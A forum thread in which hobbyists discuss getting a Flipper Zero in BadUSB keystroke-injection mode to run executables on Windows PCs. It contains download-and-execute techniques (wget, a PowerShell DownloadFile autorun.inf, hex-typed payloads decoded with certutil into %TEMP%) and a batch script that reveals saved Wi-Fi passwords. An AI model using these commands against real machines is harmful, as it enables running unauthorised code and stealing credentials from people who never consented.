Running a program from Flipper

Can I run a .exe file on a Windows PC from flipper?

For example, I have created a python executable and I would like to run it when BadUSB is ran.

1 Like

As far as i know only if the file is already on the PC because flipper will not act as a storage device while on Bad USB mode, just emulates keyboard so you can’t move files from/to the flipper while in that mode.

Theoretically you can upload that executable online, have your BadUSB download that file with shell ( wget) and then run it.

This question tickled me and make me remember an old method I used lots of years ago. Basically the problem is that to upload a binary file and then run it only with the keyboard. Is this possible? The short question is Yes. And the main steps are:

  1. encode in hex format your file
  2. upload with the keyboard into the target machine
  3. make the target decode it
  4. run the decoded file on the target

To encode and decode the file I used the certutil command that is available by default on windows (I checked only 7 and 10)

This is the script I wrote, it will create and run a tiny.exe file on the target.
The exe will only display a messageBox but keep in mind not to trust anyone on internet, so BEFORE running the script check the content.

badusb_runexe.txt (2.6 KB)

If you need a better explanation check on my Github at this link: flipperzero_scripts/badusb_runexe.md at master · cberetta/flipperzero_scripts · GitHub

2 Likes

Very cool, it would be like running and hex editor by keyboard commands and fill it in with the hex data of the executable file but on that case you wuld require the hex editor software to be already on the PC. You can’t do the other way so the limitation would be not to be able to save data to the flipper.

If the target has python installed you can always just pipe the body of a script into the python command.

But I like the idea of banging out the hex into an executable, that’s a good one.

2 Likes

You can run any file from a external usb device. Flipper may require specific code to as presented by @ cberetta.

On my point of view…

autorun.inf

[AutoRun]
icon=%temp%\1.exe
open=cmd.exe /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exeUseAutoPlay=0
label=My USB
CustomEvent=My USB

Have a try at my script https://github.com/Zarcolio/flipperzero/blob/main/BadUSB/Ducky%20Scripts/Offensive/ExeFromUsb.txt
You can insert an USB drive with a predefined but random file names and have this Ducky script run a predefined exe file with predefined parameters.
Let me know what you think of it :blush:

1 Like

Looks good.

1 Like

Why not apply to something like…

@echo off
title Hacxx - View wifi passwords
set /p id4="Write Name/SSID of Wifi network: " 
netsh wlan show profiles "%id4%" Key=clear | Findstr Key
pause

Apply this where?
The script I made is for executing programs.
I have a different script for exfilling wifi passwords (although others have created better ones)

My point was, is not hard to develop code for flipper zero. The script i provide is a batch script and you can run on windows. You can adjust to the flipper zero device.

Can you tell me more about extension, etc and some info about your badusb_runexe.txt

What you need to know?
The script does not use any extensions, you can use with any kind of exe file, you have only to encode it into HEX values and modify the script accordingly.

1 Like

Just review the code now. The hex values are binary strings for an exe. It writes the hex codes to “%TEMP%\tiny.hex” and compile them with certutil -f -decodeHex “%TEMP%\tiny.hex” “%TEMP%\tiny.exe” and runs at the end the exe.

My idea is to develop a UI that asks users for personalizations and customize the code to the user. At the end the UI gives the option to save the file. Don’t know what extension for your file as it isn’t cmd.exe commands. Nevertheless is easy understandable.

Thanks